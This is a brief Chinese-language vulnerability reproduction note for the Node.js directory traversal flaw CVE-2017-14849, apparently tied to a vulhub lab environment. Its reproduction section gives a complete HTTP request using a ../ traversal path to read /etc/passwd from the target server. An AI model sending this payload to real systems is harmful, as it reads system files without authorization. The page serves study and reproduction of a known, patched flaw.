Node.js 目录穿越漏洞(CVE-2017-14849)

漏洞详细

有关详细请看:https://vulhub.org/#/environments/node/CVE-2017-14849/

漏洞复现

发送以下数据包,即可读取文件

GET /static/../../../a/../../../../etc/passwd HTTP/1.1
Host: your-ip:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close


Node.js 目录穿越漏洞(CVE-2017-14849)

上一篇:苹果发布影响其数十亿设备的远程黑客漏洞补丁


下一篇:飞利浦医学成像系统披露多个安全漏洞,黑客可远程控制!